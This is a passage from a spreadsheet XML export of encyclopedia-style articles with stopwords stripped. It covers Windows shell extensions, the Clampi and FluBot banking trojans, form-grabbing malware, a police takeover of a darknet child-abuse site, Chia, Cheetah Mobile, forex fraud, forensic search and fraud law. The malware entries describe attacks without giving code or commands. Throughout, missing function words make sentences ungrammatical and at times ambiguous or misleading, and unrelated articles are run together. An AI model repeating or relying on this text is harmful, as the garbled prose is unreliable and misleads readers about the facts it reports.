takes place particular file type global basis always available. shell supports following extension handlers: namespace extensions used explorer common dialogs either display data necessarily persisted files folder-like view present data different organization file system. this feature exploited hierarchical data source represented file system like windows one, including cloud-based implementation. special folders, computer network places windows explorer implemented way, explorer views items mobile phone digital camera explored. source-control systems explorer browse source repositories also namespace extensions allow explorer browse revisions. implement namespace extension, ipersistfolder, ishellview, ishellfolder, ishellbrowser iolewindow interfaces need implemented registered. implementation needs provide logic navigating data store well describing presentation. windows explorer instantiate objects required.while windows explorer natively exposes extensibility points interfaces, .net framework also used write types extensions, using interop functionality .net framework. while microsoft makes available extensions photo info tool authored using .net framework, currently recommend writing managed shell extensions, instance (prior version 4.0) loaded per-process. this behavior cause conflicts multiple managed add-ins, targeting different versions clr, attempted simultaneously. also comparison file managers list alternative shells windows notes references external links sullivan, kent. "the windows user interface: case study usability engineering" (1996) association computing machinery. (sullivan developer windows team) customize windows explorer views windows msdn: creating shell extension handlers, windows center, 2018 complete idiot's guide writing shell extensions, michal dunn, march 2006 namespace extensions undocumented windows shell, henk devos, november 1999</t>
  </si>
  <si>
    <t>Clampi (trojan)</t>
  </si>
  <si>
    <t>clampi (also known ligats, llomo, rscan) strain computer malware infects windows computers. more specifically, man-in-the-browser banking trojan designed transmit financial personal information compromised computer third party potential financial gain well report computer configuration, communicate central server, downloader malware. clampi first observed 2007 affecting computers running microsoft windows operating system.clampi monitored 4000 website urls, effectively keylogging credentials user information bank credit card websites, also reported utilities, market research firms, online casinos, career websites. peak fall 2009, computer security professional stated largest professional thieving operations internet, likely russian eastern european syndicate. false-positive reporting clampi also often used tech support scammers pressure individuals sending money removal fake computer viruses. detailed analysis computer security analyst nicolas falliere claimed "few threats scratching heads like trojan.clampi." first trojan found using virtual machine called vmprotect hide instruction set. remarked virtual machine added weeks time required programmers disassemble describe threat mechanism action. discovered logged transmitted personal financial information compromised computer third party potential financial gain well reported computer configuration, communicated central server, exploited internet explorer socks proxy, acted downloader malware. virus sophisticated enough hide behind firewalls undetected long periods time. list around 4,800 urls encoded (similar hashing). this dictionary attacked list common urls september 2009 produce partial list known sites duplication ambiguity. source code never reported shared sold online. named modules list components discovered decryption executable 2009: socks configures socks proxy server attackers bank work/home internet connection. prot steals pstore (protected storage internet explorer) saved passwords logger attempts steal online credentials list. loggerext aids stealing online credentials websites enhanced security, https spread spreads clampi computers network shared directories. accounts steals locally saved credentials variety applications instant messaging clients. info gathers sends general system information kernal eighth module refers kernal running inside proprietary protected virtual appliance. also botnet conficker gameover zeus, successor zeus operation tovar timeline computer viruses worms tiny banker trojan torpig zombie (computing) references external links clampi virus targets companies' financial accounts news massive botnet stealing financial info world inside jaws trojan.clampi symantec security whitepaper (archived)</t>
  </si>
  <si>
    <t>FluBot</t>
  </si>
  <si>
    <t>flubot sophisticated computer virus –specifically banking trojan– global reach aims steal private data android smart phones. unlike much malware, flubot proven exceptionally durable, coming waves "campaigns" redesign. masquerades innocuous messages missed calls deliveries, asking receiver click links download spyware. variant, teabot, infiltrated official stores, including google play store, guise qr-code reader.16,000 reports flubot reported australian competition consumer commission's scamwatch australia across eight weeks 2021. year, losses $211 million flubot scammers reported seven news, advised delete messages immediately. although coverage flubot primarily centres australia zealand, scam also targeted european countries germany poland 2022 campaigns.in 2022, flubot infrastructure taken operation involving countries expected resurge. references</t>
  </si>
  <si>
    <t>Flushot Plus</t>
  </si>
  <si>
    <t>ross matthew greenberg (september 1956 february 2017) american software developer, noted creating first antivirus software products. also worked journalism, founding member internet press guild. career flushot plus 1987, software concepts design, greenberg released first heuristic antivirus software utilities, flushot plus. released shareware $10.o'reilly book author roger grimes described flushot plus "the first holistic program fight [malicious mobile code]." journalism 1980s, greenberg frequent contributor magazine, primary sysop compuserve forum, magnet.in 1996, became founder member internet press guild. personal life greenberg born york city, raised syosset. parents muriel walter greenberg. sisters: toni (richard) koweek carla kaplan.greenberg attended state university york stony brook, graduating 1978.greenberg's wife, dawn, marietta, georgia.greenberg survived wife, wade maxwell greenberg marietta, step-daughter chanice hughes-greenberg nyc, elder sister toni hudson. health issues death greenberg suffered multiple sclerosis, first diagnosed mid-1980s. elder sister described form illness "aggressive".in late 2009, condition became challenging family care him, greenberg moved nursing home near atlanta, georgia. later moved nursing home forsyth, georgia. august 2015, moved chelsey park health rehabilitation center, dahlonega, georgia, died contracting pneumonia, february 2017. also interrupt list ms-dos references</t>
  </si>
  <si>
    <t>FlyBack</t>
  </si>
  <si>
    <t>flyback open-source backup utility linux based modeled loosely apple's time machine. overview flyback creates incremental backups files, restored later date. flyback presents chronological view file system, allowing individual files directories previewed retrieved time. flyback originally based rsync project began 2007, october 2009 rewritten scratch using git. user interface flyback presents user typical file-manager style view file system, additional controls allowing user forward backward time. shows user files exist, exist changed since last version, allows preview deciding restore ignore them. user settings flyback settings preferences: backup location inclusion list (files folders) exclusion list (files folders) when automatically start backup when automatically delete backupsfurther, flyback allows users commence backup, restore selected files. requirements flyback written python using gtk. these libraries, well program git, installed software function properly. also list backup software revision control versioning file system references external links code.google.com/p/flyback/</t>
  </si>
  <si>
    <t>Foldering</t>
  </si>
  <si>
    <t>foldering practice communicating messages saved "drafts" folder email electronic messaging account accessible multiple people. messages never actually sent.foldering described digital equivalent dead drop. history foldering reportedly used al-qaeda least early 2005 also used drug cartels. notable cases 2012, david petraeus reported used foldering communicate paula broadwell.in june 2018, greg andres cited paul manafort's foldering evidence manafort engaged deceptive behaviours. depictions popular culture foldering depicted movie traitor (2008). also dead drop tradecraft references</t>
  </si>
  <si>
    <t>Foreign exchange fraud</t>
  </si>
  <si>
    <t>foreign exchange fraud trading scheme used defraud traders convincing expect gain high profit trading foreign exchange market. currency trading became common form fraud early 2008, according michael dunn u.s. commodity futures trading commission.the foreign exchange market best zero-sum game, meaning whatever trader gains, another loses. however, brokerage commissions transaction costs subtracted results traders, making foreign exchange negative-sum game. government interventions august 2008, cftc special task force deal growing foreign exchange fraud. january 2010, cftc proposed rules limiting leverage based number improper practices" retail foreign exchange market, "among solicitation fraud, lack transparency pricing execution transactions, unresponsiveness customer complaints, targeting unsophisticated, elderly, worth vulnerable individuals".in 2012, christopher ehrman, veteran, selected office whistleblower. types fraud frauds might include churning customer accounts purpose generating commissions, selling software supposed guide customer large profits, improperly managed "managed accounts", false advertising,ponzi schemes, outright fraud. also refers retail forex broker indicates trading foreign exchange risk, high profit investment. increase fraud u.s. commodity futures trading commission (cftc), regulates foreign exchange market united states, noted increase amount unscrupulous activity non-bank foreign exchange industry. between 2001 2006, cftc prosecuted cases involving defrauding 23,000 customers lost us$350 million. from 2001 2007, 26,000 people lost us$460 million forex frauds. beating market foreign exchange market zero-sum game many experienced, well-capitalized professional traders (e.g. working banks) devote attention full-time trading. inexperienced retail trader significant information disadvantage compared traders. retail traders undercapitalized. thus, subject problem gambler's ruin: "fair game" (one information advantages) player lower amount capital higher probability going bankrupt high-capital player. retail trader always pays bid/ask spread makes odds winning less fair game. additional costs include margin interest spot position kept open day, trade "resettled" day, time costing full bid/ask spread. variations forex trading, customers obtain normal fungible futures, instead make contract named company. even company claims "forex dealer", financially interested making retail customer lose money. contract directly customer pseudo-dealer, off-exchange one; cannot normally registered traded futures exchanges.although possible experts successfully arbitrage market unusually large return, mean larger number could earn returns even given tools, techniques, data sources. this arbitrages essentially drawn pool finite size; although information capture arbitrages nonrival good, arbitrages rival good. analogy: total amount buried treasure island same, regardless many treasure hunters bought copies treasure map. high leverage offering high leverage, market makers encourage traders trade extremely large positions. this increases trading volume cleared market maker increases profit, increases risk trader receive margin call. while professional currency dealers banks hedge funds tend 10:1 leverage, retail clients offered leverage 1000:1. fraud country transparency, regulatory authorities openly publish following: list regulated companies/firms, warnings regulated companies, cases opened regulated companies, fines levied regulated companies, revocation companies license well general news announcements. united kingdom financial conduct authority (fca) website lists guides avoiding fraud/scams well public list warnings recorded fca. official investment firm warning list online guide avoid scams guide report scam investment scam support website news investment firms cyprus cyprus securities exchange commission (cysec) provides public access information regarding process obtain authorisation well listed current past cysec authorised companies. list current 'cyprus investment firms' (cifs) list former cyprus investment firms list issued cysec warnings list announced board decisions (including fines) convicted scammers russell cline russell erxleben sterling currency group joel ward wincapita also boiler room bucket shop foreign exchange market forex scandal fraud gambler's conceit gambler's ruin high-yield investment program references external links commodity futures trading commission forex fraud advisory</t>
  </si>
  <si>
    <t>Forensic Toolkit</t>
  </si>
  <si>
    <t>forensic toolkit, ftk, computer forensics software made accessdata. scans hard drive looking various information. can, example, potentially locate deleted emails scan disk text strings password dictionary crack encryption.ftk also associated standalone disk imaging program called imager. this tool saves image hard disk file segments later reconstructed. calculates sha1 hash values verify integrity data imaged consistent created forensic image. forensic image saved several formats, including dd/raw, e01, ad1. references external links accessdata forensic toolkit</t>
  </si>
  <si>
    <t>Forensic corporate collections</t>
  </si>
  <si>
    <t>forensic corporate collections refer type debt collection recovery tactics apply computer forensics scientific knowledge debt collection process. process engaging consistently updated computer software debt collection process, forensic corporate collection agencies able identify, retrieve, protect electronic evidence fraud (and illegal means avoiding debt) found computers evidence case litigation. order forensic collections agency used means recovering debt, agency must compliant knowledgeable investigation basics, federal, state local policies, standards, laws legal processes. they must also working knowledge types crimes incidents debt deception fraud, computing environment types evidence, well investigative tools, technical training, forensic recovery equipment. order effectively recover locate debtors client(s), forensic collections agents become adept conversant evidence collection management, managing incident scene, investigation computer systems, disks, file structures, extracting preserving computer electronic evidence, e-mail internet investigations, cell phone investigations, digital footprints debtors invariably leave behind. references</t>
  </si>
  <si>
    <t>Forensic search</t>
  </si>
  <si>
    <t>forensic search emerging field computer forensics. forensic search focuses user created data email files, cell phone records, office documents, pdfs files easily interpreted person. forensic search differs computer forensic analysis seek review analyze lower level system files registry, link files disk level issues commonly associated traditional computer forensic analysis. purpose forensic search emerged number factors including: improvements technologies enable lesser qualified users undertake search analysis data would previously undertaken computer forensic expert. (this trend seen many industries). need reduce high cost undertaking full computer forensic analysis user's computer, cases evidence found user created data useful required. rise cloud computing seen move away data storage local computer hardware data storage number remote locations. lack qualified computer forensic experts need address backlog cases policing agencies computer-based information requires review. need involve types expertise proper assessment evidence, e.g. knowledge accounting regulations, legal knowledge, etc. objectives objective forensic search software allow person general knowledge computers, skilled document review investigation techniques, undertake search user created electronically stored information (esi). data typically considered user created made emails, documents, pictures file types created user, opposed data created computer's operating system (i.e. registry files, link files, unallocated space. these controlled created computer user). objective reviewing user created data find information used base decisions part investigation. forensic search software forensic search software differs using native applications (e.g. outlook) desktop search software (e.g. google desktop) search data changes made data processing searching impact results skew findings. forensic search software also allow access base metadata items available native application. good example would metadata word documents. number forensic search software products able perform data recovery range email file types. some examples using native application non-forensic application affect data: opening microsoft word document microsoft word change created, modified last accessed dates document. this could lead incorrect dates supplied evidence. reviewing data native applications trigger systems antivirus software, changing data altering evidence. failure freeze evidence prior opening files, coupled fact merely opening files changes them, invalidated critical evidence.forensic search software become popular method reducing time cost search analysis larger data sets focusing user data often yields evidence results.e-mail tends personal, plentiful candid. adults, e-mail primary means written communication often sought evidence. generation tools developed order address challenges faced digital forensic ediscovery practitioners. other types review forensic search software likened ediscovery review software, however strictly case. ediscovery review software, dealing many type computer records search options, offer extra functionality forensic fearch software. features redaction legal hold standard ediscovery review software. also case forensic search software meet higher tasks outlined widely accepted electronic discovery reference model (edrm). tasks identification, collection, rreservation rresentation generally covered forensic search software.however, true ediscovery review generally domain qualified legal practitioners companies.the term ediscovery become catchall circles processing searching electronically stored information (esi). however, true representation term ediscovery. detailed understanding ediscovery, electronic discovery reference model (edrm) good guideline. could said forensic search closely related early case assessment (eca) ediscovery require rigor full ediscovery review. evidence value user created data versus types data when presenting data part report used form decision evidence, important data correctly represented reader understand case generating reports system created data registry files, link files system created data costly exercise. also case straightforward answer explanation.an example would attempting explain person method techniques decoding userassist windows system registry. userassist hold great deal information actions user computer. however explain key, reviewer able identify correctly interpret setting. keys often encoded 13.once keys decoded human readable formats, reviewer show setting relates case. often time-consuming review hundreds, even thousands, settings times deliver circumstantial sometimes contentious findings. when reviewing user created data e-mail contracts, reporting understanding findings often much straight forward. semi skilled user usually good grasp email works day-to-day work. person trained understand contract need specialist forensic knowledge this lead much lower costs review less contentious circumstantial findings. high-level functionality forensic search software features forensic search software focused allowing user search view range data users’ files time. specific features forensic search software include: ability process varying types data enabling searched reviewer little computer forensic knowledge keyword searching across data data types processed ability create complex searches including excluding data using algorithms search identify files data ability filter based metadata dates, email addresses file types ability review different data typed search results ability view results user interface ability export items various formats i.e. email, word, html ability create shareable reports changes computer forensics there many newer emerging fields computer forensics cloud forensics, mobile phone forensics, network forensics, memory analysis, browser forensics, forensic triage internet forensics. distant past computer forensic expert's common role attend person's house, place work data center forensically "image" computers devices involved case. this categorized collection phase.once collection phase complete images reviewed relevant supplied interested parties. this required computer forensic investigator good deal experience training identifying computer, applications devices involved disassemble computer extract hard drives computer without causing damage. correctly take forensic image keep chain custody forensic analysis software correctly interpret supply resultsthis process time-consuming costly. computer forensic expert's primary role investigate computer evidence (esi). they familiar entire case objectives case agent, detective, forensic accountant crime analyst. this often non-perfect time-consuming identification correct evidence items differing parties. what would immediately flag interest detective deep knowledge case parties involved unnoticed computer forensic expert. example would email suspect another case suspect case, contact phone calls witness suspect.to compound issue, massive increase size data computer forensic expert needs collect. often case computer hard drive able imaged, example computer contains evidence big, system cannot shut take image mission critical server email server company file server. rise cloud computing also added challenges collection evidence. data requires collection review reside cloud. case computer available image. forensic expert needs collect information using forensic software designed work certain cloud providers.in short collection evidence changed significantly past years. recognizing challenges, concept hybrid forensics discussed creation tools adopt different approach collecting data. concept hybrid forensics selective collection data 'live' systems considered reliable evidence court. barriers adoption forensic search enforcement enforcement organizations like many organizations divided skill specific units. computer forensic cybercrime area units take responsibility aspects esi. these units usually time poor resourced.albeit time resources main knowledge unit comes officers consultants years experience (this predates computer forensic degrees available). these officers become familiar time methodology using forensic analysis software package offer started field. hence officers resources become available forensic analysis software prioritized newer specific software newer forensic field types. references</t>
  </si>
  <si>
    <t>Form grabbing</t>
  </si>
  <si>
    <t>form grabbing form malware works retrieving authorization log-in credentials data form passed internet secure server. this allows malware avoid https encryption. this method effective keylogger software acquire user’s credentials even input using virtual keyboard, auto-fill, copy paste. sort information based variable names, email, account name, password. additionally, form grabber title website data gathered from. history method invented 2003 developer variant trojan horse called downloader.barbew, attempts download backdoor.barbew internet bring local system execution. however, popularized well known type malware attack emergence infamous banking trojan zeus 2007. zeus used steal banking information man-in-the-browser keystroke logging form grabbing. like zeus, barbew trojan initially spammed large numbers individuals e-mails masquerading big-name banking companies. form grabbing method first advanced iterations zeus allowed module detect grabbed form data also determine useful information taken was. later versions, form grabber also privy website actual data submitted, leaving sensitive information vulnerable before. known occurrences trojan known tinba (tiny banker trojan) built form grabbing able steal online banking credentials first discovered 2012. another program called weyland-yutani first software designed attack macos platform work firefox. injects templates weyland-yutani different existing ones zeus spyeye.another known version british airways breach september 2018. british airways’ case, organizations’ servers appeared compromised directly, attackers modifying javascript files (modernizr javascript library, version 2.6.2) include pii/credit card logging script would grab payment information send information server controlled attacker hosted “baways[.]com” domain certificate issued “comodo” certificate authority. british airways mobile application also loads webpage built javascript components main website, including malicious script installed magecart. thus, payments made using british airways mobile also affected. countermeasures recent increase keylogging form grabbing, antivirus companies adding additional protection counter efforts key-loggers prevent collecting passwords. these efforts taken different forms varying antivirus companies, safepay, password manager, others. counter form grabbing, users' privileges become limited would prevent installing browser helper objects (bhos) form grabbing software. administrators create list malicious servers firewalls.new countermeasures, using out-of-band communication, circumvent form grabbers man-in-the-browser also emerging; examples include forml3ss.; circumvent threat different communication channel send sensitive data trusted server. thus, information entered compromised device. alternative initiatives fidelius added hardware protect input/output compromised believed compromised device. also keystroke logging malware trojan horse security exploits computer insecurity internet privacy tiny banker trojan references</t>
  </si>
  <si>
    <t>Childs Play (website)</t>
  </si>
  <si>
    <t>childs play [sic] darknet child abuse website operated april 2016 september 2017, peak largest class. site concealed hidden service network. after running site first months, owner benjamin faulkner guelph, ontario, canada captured united states department homeland security. remaining eleven months website owned operated australian queensland police service's task force argos, part operation artemis. reactions website australian police months, involved impersonation forum owner warhead (faulkner's alias) required police regularly post child abuse images, order convince users site compromised. ivar stokkereit, legal adviser united nations children's fund (unicef) norway, stated clear violation convention rights child, even though police’s intention prevent offenses long run". amnesty international also criticized actions "unacceptable human rights law". ecpat (end child prostitution, child pornography trafficking children sexual purposes) supported proactive approach taken task force argos.james sheptycki, professor criminology york university, criticized transfer website original server europe australia "jurisdiction shopping", done favourable legal framework australia would allow website continue running way. convictions capture site, subsequent gather information, arrests convictions: benjamin faulkner's associate, patrick falte, captured together faulkner virginia october 2016 days raped four-year-old girl. falte administrator giftbox exchange, another darknet child exploitation site shut november 2016. both sentenced life imprisonment rape girl subsequently sentenced years engaging child exploitation enterprise. andrew leslie, middleburg, florida, sentenced years prison engaging child exploitation enterprise, member giftbox exchange. leslie also operated another darknet child exploitation network featured videos severe violent sexual abuse children, march 2018 sentenced additional years prison sexual abuse production child sexual abuse infants toddlers. brett bedusek, cudahy, wisconsin, sentenced years prison engaging child exploitation enterprise violation previous supervised release type offense. four mentioned offenders addition sentenced lifetime supervised release. site administrator tyler david walker, 21-year-old canadian, initially arrested matter march 2017, sentenced five years prison. site user robert zitzelsperger, former science teacher sydney. media portrayals november 2019 canadian network collaboration norwegian (verdens gang) published six-part podcast called hunting warhead, chronicling investigation journalist håkon høydal norwegian computer security expert child sexual abuse networks dark web. course episodes, journalist daemon fairless examines background benjamin faulkner course events capture. references</t>
  </si>
  <si>
    <t>Chiemgauer</t>
  </si>
  <si>
    <t>chiemgauer regional local currency started 2003 prien chiemsee, bavaria, germany. named chiemgau, region around chiemsee lake, intended increase local employment, supporting local culture, make local food supply resilient. chiemgauer operates fixed exchange rate, tied value euro: chiemgauer history 2003, christian gelleri, high school teacher, started project students, charge designing printing vouchers take care administration, accounting, advertising, tasks. chiemgauer member regional currencies' network called regiogeld (regiomoney association). gelleri inspired economists silvio gesell rudolf steiner, former's freigeld. chiemgauer intended for: employment creation: unemployed, students, volunteers hired work, earning allowances promotion cultural, educational environmental activities: chiemgauer system supports nonprofits work purposes promotion sustainability: organic food renewable energy among others strengthening solidarity: enhancing human relationship local shoppers businesses stimulation local economy: chiemgauer retains purchasing power within region better euro favors local small businesses, stimulating transactions demurrage. express-money: example complementary currency national level 2006, electronic form chiemgauer, "echiemgauer", established. bank accounts used operations; made possible cooperation cooperative local banks. only businesses nonprofits need additional electronic accounts, consumers possibility electronic cards called "regiocard". two-thirds chiemgauer turnover electronic. demurrage year (between 2003 2015: 8%). chiemgauer grown found primarily bavaria munich, germany, salzburg, austria (germany, austria, switzerland combined regional currency systems 2009). overview chiemgauer, whose value fixed euro, circulates follows within districts rosenheim traunstein: issuing office: consumers change euros chiemgauer issuing offices. consumers: exchange chiemgauer €100 exchanged chiemgauer. chiemgauer spent local businesses face value, thereby helping local nonprofits businesses without cost. "bonus", exchanging euros chiemgauer choose non-profit receives value exchanged. businesses: accept chiemgauer face value spend purchases, also option exchange chiemgauer €95, losing commission earning attracting chiemgauer members products and/or services. this, allocated administrative costs, represents donation nonprofit chiemgauer originally bought. nonprofits: receive amount euros exchanged chiemgauer. this motivates supporters participate project. registration form consumers choose nonprofit support. demurrage bills chiemgauer issued. maintain individual bill's validity, "scrip" corresponding banknote value must paid every three months. this system, called demurrage, form currency circulation invented silvio gesell. specifically: ...in order prevent complementary currency degenerating means hoarding confer high liquidity. required stamp face value (€0.10 chiemgauer, instance) every three months keep valid, obliging bearers give hoarding complementary currency spend soon possible stimulating consequently regional economy. because loses value every quarter, users incentivized spend money. notes expiry date need renewed sticker costing value. quicker money spent, faster, macroeconomic terms, velocity. gesell argued higher velocity money helps combat deflation. businesses nonprofits there different rules nonprofits businesses. nonprofits purchase chiemgauer €97, potentially increasing value money hand, businesses accept chiemgauer subject commission want change back euros, incentivizes work within system also potentially increase chiemgauer users example, getting local suppliers accept payments chiemgauer. interest since 2007, chiemgauer could saved without interest social cooperative called regios. likewise, microcredit program businesses nonprofits existed since 2010 loans available amounts ranging €1,000 €20,000. interest calculated rate loan issued chiemgauer paid back time without fault, entire interest costs paid back debtor. data also berkshares complementary currencies demurrage (currency) local currency urstromtaler bank wörgl references</t>
  </si>
  <si>
    <t>Chia (cryptocurrency)</t>
  </si>
  <si>
    <t>chia cryptocurrency mining chiasphere, farming) based amount hard disk storage space devoted rather processing power proof work cryptocurrencies bitcoin ethereum. platform created california based company called chia network inc. chia network founded 2017 american computer programmer bram cohen, author bittorrent protocol. 2021, chia network raised million investment, valuing company $500 million. month, company announced plans conduct 2021, however march 2022, occurred. computer data storage shortages china stockpiling ahead 2021 launch shortages increase price hard disk drives (hdd) solid-state drives (ssd). shortages also reported vietnam. hard drive manufacturer seagate said 2021 company experiencing strong orders staff working "adjust market demand". 2021 gene hoffman, president chia network, admitted "we’ve kind destroyed short-term supply chain" hard disks. concerns also raised mining process destroying drives' lifetime. references</t>
  </si>
  <si>
    <t>Cheetah Mobile</t>
  </si>
  <si>
    <t>cheetah mobile (猎豹移动公司) chinese mobile internet company headquartered beijing. january 2017, million monthly active users. history formation chen (zh:陳睿 current bilibili) founded cheetah mobile. company established 2010 merger kingsoft security (chen served general manager) conew image, grew second-largest internet security software provider china, according iresearch. company located yaojiayuan south chaoyang district, beijing, china. initial public offering 2014, cheetah mobile launched selling million american depositary shares us$14 share, thereby raised us$168 million. managed morgan stanley, morgan chase co., credit suisse group. kingsoft tencent major investors cheetah mobile, holding respectively. post late 2015, cheetah mobile announced entered global strategic partnership yahoo. company incorporated yahoo's search native advertising platforms within apps. result this, cheetah mobile stated revenue generated yahoo increased percent daily within first weeks.in february 2016, cheetah mobile cubot launched cheetahphone, android marshmallow based smartphone, barcelona, spain. acquisition august 2016, cheetah mobile announced acquisition french startup news republic million. news republic news aggregator. fraud accusation march 2020, cheetah mobile banned google play scheme fraud, resulting games removed part deletion. products cheetah mobile's supported products include: computer applications clean master claims improve performance erasing junk files optimizing device memory. premium version available recovers lost files updates drivers, among claims. available android. browser browser based chromium, claims first dual-core security browser china. games bang 2048 similar game 2048, numbers replaced animals. just puzzle players adjacent tiles number, tapping merges position tapped. don't white tile players must avoid white tiles. piano tiles don't white tile sequel don't white tile, including gameplay songs. rolling fast-paced game players must roll ball different levels. dash fast-paced game players must keep character falling platform throughout different levels. rolling fast-paced game players around obstacles collect moons dancing line rhythm game beat. arrow.io archery game ranges arenas. fish: abyssrium marine aquarium game goal collect hidden fishes. mobile applications antutu armorfly browser claims high privacy security. battery doctor claims extend smartphone battery standby time. clean master claims improve smartphone performance free storage space erasing junk files, optimizing memory, providing full protection viruses, trojans, malware. there significant controversy online whether application actually effective not. cloud space security cloud backup tool back user's photos, call logs, contact information messages. backup cloud backup service. browser mobile browser antivirus security functions. flashlight supported flashlight built-in compass. keyboard keyboard application allows customizing phone's keyboard. launcher launcher compatible android devices. locker android lockscreen app. security master antivirus application android phones. security free application. speed booster android optimizer. swipe quick access tool easy access apps tools hand. touchme assistive tool quickly access system operations apps, inspired assistive touch tool ios. transfer file transfer tool exchange photos, videos, music apps offline. code code scanner supported code scanner tool hidden codes. file manager popular android, bought early 2014 rhythm software, based haidian, beijing, gotap! data management tool claims help users manage reduce mobile data usage battery. heartbleed scanner heartbleed virus scanner application scans android operating system device vulnerable 2014 heartbleed exploit. notification cleaner notification manager tool. quickpic gallery photo gallery application. which acquired q-supreme team 2015. ransomware killer ransomware virus killer application claims kill malware infected android phone. simplelocker cleaner locker cleaner application performs full scan android device, checks example cryptolocker virus present. claims special anti-hijack solution remove infection. speed test wifi speed test tool helps scan wifi connections, check security speed connection, optimize speed. struts server scanner server scanner application scans browser history detects whether recently visited websites affected struts flaw. stubborn trojan killer mobile antivirus application claims stubborn trojans can't deleted common antivirus apps. whatscall caller application free global secure calls. 2face account management application instant simultaneous access exact copies applications social, gaming messaging apps single device. artificial intelligence technology platform power cheetah mobile full line products. orionos platform smart devices collaboration orionstar cheetah voicepod voice recognition speaker based cheetah greetbot receptionist robot deal customers cheetah friendbot educational robot children cheetah vendbot vending machine robot commercial cheetah cheetah mobile's self-operated platform offering wide range formats, high-performing display native ads, full-screen vertical video. data cheetah data global mobile data analysis platform. controversies despite popularity clean master android app, reported 2014 promoting clean master manipulate android users deceptive tactics browsing websites within app's advertising framework. april 2014, ferenc lászló nagy sophos labs captured pop-up clean master, warning device infected virus.in july 2014, cheetah mobile encouraged users uninstall google chrome replace cheetah mobile's browser clean master's clean optimization process. this practice allowed cheetah mobile gain unfair position marketplace google crackdown.in december 2018, cheetah mobile implicated massive click fraud scheme, leading google remove apps play store. cheetah mobile denied charges. february 2020, google banned nearly apps play store including cheetah mobile's apps "for violating disruptive policy disallowed interstitial policy."as march 2020, apps made cheetah mobile, along benchmarking antutu apps, banned google play store. references external links cheetah mobile</t>
  </si>
  <si>
    <t>Fourth Corner Exchange</t>
  </si>
  <si>
    <t>fourth corner exchange sustainable community currency based pacific northwest united states, founded 2002 francis ayley group like minded friends. fourth corner exchange started trading january 2004, utilizing basic time-based currency system features local exchange trading systems. there presently five-hundred fifty members bellingham, washington, port townsend, washington, everett, washington, mount vernon, washington, portland, oregon. prospective members must attend members meeting order join trade members. meetings held bellingham, port townsend, mount vernon, everett, portland many locations. fourth corner exchange spread parts usa, notably oregon, california, mexico, colorado ohio. original software used fourth corner's website released general public license (gpl) distributed sourceforge. fourth corner exchange database program significantly modified since open source release. external links fourth corner exchange inc. (official site) local exchange software (via sourceforge) local currencies replacing scarcity trust, video interview fourth corner founder francis ayley.</t>
  </si>
  <si>
    <t>FoxBlade</t>
  </si>
  <si>
    <t>foxblade trojan horse wiper malware identified february 2022 microsoft's threat assessment center appeared aimed targets ukraine's government. foxblade discovered ukrainian networks 2022 ukraine invasion, suspected part cyberattacks ukraine connected invasion. coordination united states microsoft reported unusually productive, executives given security clearances join calls intelligence officials. microsoft coordinated european union prevent foxblade used countries europe. also cyberwarfare russian invasion ukraine notpetya references</t>
  </si>
  <si>
    <t>Fraud</t>
  </si>
  <si>
    <t>law, fraud intentional deception secure unfair unlawful gain, deprive victim legal right. fraud violate civil (e.g., fraud victim fraud perpetrator avoid fraud recover monetary compensation) criminal (e.g., fraud perpetrator prosecuted imprisoned governmental authorities), cause loss money, property, legal right still element another civil criminal wrong. purpose fraud monetary gain benefits, example obtaining passport, travel document, driver's license, mortgage fraud, perpetrator attempt qualify mortgage false statements.a hoax distinct concept involves deliberate deception without intention gain materially damaging depriving victim. civil wrong common jurisdictions, civil wrong, fraud tort. while precise definitions requirements proof vary among jurisdictions, requisite elements fraud tort generally intentional misrepresentation concealment important fact upon victim meant rely, fact rely, harm victim. proving fraud court often said difficult intention defraud element question. such, proving fraud comes "greater evidentiary burden civil claims." this difficulty exacerbated fact jurisdictions require victim prove fraud clear convincing evidence.the remedies fraud include rescission (i.e., reversal) fraudulently obtained agreement transaction, recovery monetary award compensate harm caused, punitive damages punish deter misconduct, possibly others.in cases fraudulently induced contract, fraud serve defense civil action breach contract specific performance contract. similarly, fraud serve basis court invoke equitable jurisdiction. criminal offence common jurisdictions, criminal offence, fraud takes many different forms, general (e.g., theft false pretense) specific particular categories victims misconduct (e.g., bank fraud, insurance fraud, forgery). elements fraud crime similarly vary. requisite elements perhaps general form criminal fraud, theft false pretense, intentional deception victim false representation pretense intent persuading victim part property victim parting property reliance representation pretense perpetrator intending keep property victim. region north america canada section 380(1) criminal code provides general definition fraud canada: 380. every who, deceit, falsehood fraudulent means, whether false pretence within meaning act, defrauds public person, whether ascertained not, property, money valuable security service, guilty indictable offence liable term imprisonment exceeding fourteen years, subject-matter offence testamentary instrument value subject-matter offence exceeds five thousand dollars; guilty indictable offence liable imprisonment term exceeding years, (ii) offence punishable summary conviction, value subject-matter offence exceed five thousand dollars. addition penalties outlined above, court also issue prohibition order 380.2 (preventing person "seeking, obtaining continuing employment, becoming volunteer capacity, involves authority real property, money valuable security another person"). also make restitution order 380.3.the canadian courts held offence consists distinct elements: prohibited deceit, falsehood fraudulent means. absence deceit falsehood, courts look objectively "dishonest act"; deprivation must caused prohibited act, deprivation must relate property, money, valuable security, service.the supreme court canada held deprivation satisfied proof detriment, prejudice risk prejudice; essential actual loss. deprivation confidential information, nature trade secret copyrighted material commercial value, also held fall within scope offence. united states criminal fraud proof requirements criminal fraud charges united states essentially requirements crimes: guilt must proved beyond reasonable doubt. throughout united states fraud charges misdemeanours felonies depending amount loss involved. high value fraud also trigger additional penalties. example, california, losses $500,000 result extra two, three, five years prison addition regular penalty fraud.the u.s. government's 2006 fraud review concluded fraud significantly under-reported crime, various agencies organizations attempting tackle issue, greater co-operation needed achieve real impact public sector. scale problem pointed need small high-powered body bring together numerous counter-fraud initiatives existed. civil fraud although elements vary jurisdiction specific allegations made plaintiff files lawsuit alleged fraud, typical elements fraud case united states that: somebody misrepresents material fact order obtain action forbearance another person; person relies upon misrepresentation; person suffers injury result forbearance taken reliance upon misrepresentation.to establish civil claim fraud, jurisdictions united states require element fraud claim pleaded particularity proved preponderance evidence, meaning likely fraud occurred. some jurisdictions impose higher evidentiary standard, washington state's requirement elements fraud proved clear, cogent, convincing evidence (very probable evidence), pennsylvania's requirement common fraud proved clear convincing evidence.the measure damages fraud cases normally computed using rules: "benefit bargain" rule, allows recovery damages amount difference value property represented actual value; out-of-pocket loss, allows recovery damages amount difference value given value received.special damages allowed shown proximately caused defendant's fraud damage amounts proved specificity. many jurisdictions permit plaintiff fraud case seek punitive exemplary damages. pacific asia china zhang yingyu's story collection book swindles (available here; 1617) testifies rampant commercial fraud, especially involving itinerant businessmen, late ming china. economist, cnn, media outlets regularly report incidents fraud faith chinese business trade practices. forbes cites cybercrime persistent growing threat 